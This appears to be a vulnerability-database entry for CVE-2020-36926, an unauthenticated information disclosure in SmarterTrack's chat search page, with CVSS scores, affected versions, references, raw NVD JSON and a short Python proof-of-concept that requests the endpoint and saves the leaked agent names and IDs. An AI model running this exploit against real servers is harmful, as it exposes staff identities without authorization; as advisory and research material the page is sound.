CVE-2020-36926

Description

SmarterTrack 7922 contains an information disclosure vulnerability in the Chat Management search form that reveals agent identification details. Attackers can access the vulnerable /Management/Chat/frmChatSearch.aspx endpoint to retrieve agents' first and last names along with their unique identifiers.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:smartertools:smartertrack:10.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:smartertools:smartertrack:14.0:*:*:*:*:*:*:* - VULNERABLE

SmarterTrack <= 7922

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2020-36926 PoC - SmarterTrack Information Disclosure
# Target: SmarterTrack <= 7922
# Endpoint: /Management/Chat/frmChatSearch.aspx

def exploit_cve_2020_36926(target_url):
    """
    Exploit for SmarterTrack Chat Management Information Disclosure
    This PoC demonstrates unauthorized access to agent information
    """
    # Target endpoint that leaks agent information
    endpoint = "/Management/Chat/frmChatSearch.aspx"
    full_url = target_url.rstrip('/') + endpoint
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    }
    
    print(f"[*] Exploiting CVE-2020-36926")
    print(f"[*] Target: {full_url}")
    
    try:
        # Send unauthenticated request to vulnerable endpoint
        response = requests.get(full_url, headers=headers, timeout=30, verify=False)
        
        if response.status_code == 200:
            print(f"[+] Request successful - Status: {response.status_code}")
            print(f"[+] Agent information may be exposed in response")
            
            # Extract potential agent data from response
            if 'Agent' in response.text or 'agent' in response.text:
                print("[!] Agent identifiers found in response")
            
            # Save response for analysis
            with open('cve_2020_36926_response.html', 'w') as f:
                f.write(response.text)
            print("[*] Response saved to cve_2020_36926_response.html")
            
            return True
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = "http://target-server.com"  # Replace with actual target
    
    exploit_cve_2020_36926(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-36926
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-36926
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-36926/
[4] VulDB https://vuldb.com/cve/CVE-2020-36926
[5] https://www.exploit-db.com/exploits/50328
[6] https://www.smartertools.com/
[7] https://www.smartertools.com/smartertrack
[8] https://www.vulncheck.com/advisories/smartertools-smartertrack-information-disclosure
[9] https://www.exploit-db.com/exploits/50328

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-36926", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:18.820", "lastModified": "2026-02-09T15:12:37.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SmarterTrack 7922 contains an information disclosure vulnerability in the Chat Management search form that reveals agent identification details. Attackers can access the vulnerable /Management/Chat/frmChatSearch.aspx endpoint to retrieve agents' first and last names along with their unique identifiers."}, {"lang": "es", "value": "SmarterTrack 7922 contiene una vulnerabilidad de revelación de información en el formulario de búsqueda de Gestión de Chat que revela detalles de identificación de agentes. Los atacantes pueden acceder al endpoint vulnerable /Management/Chat/frmChatSearch.aspx para recuperar los nombres y apellidos de los agentes junto con sus identificadores únicos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:smartertools:smartertrack:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "DE876385-2B46-4904-9A20-6C259C4D7DBE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:smartertools:smartertrack:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "1A9B207E-7632-4F57-9989-8241FCF01764"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50328", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.smartertools.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.smartertools.com/smartertrack", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/smartertools-smartertrack-information-disclosure", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50328", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}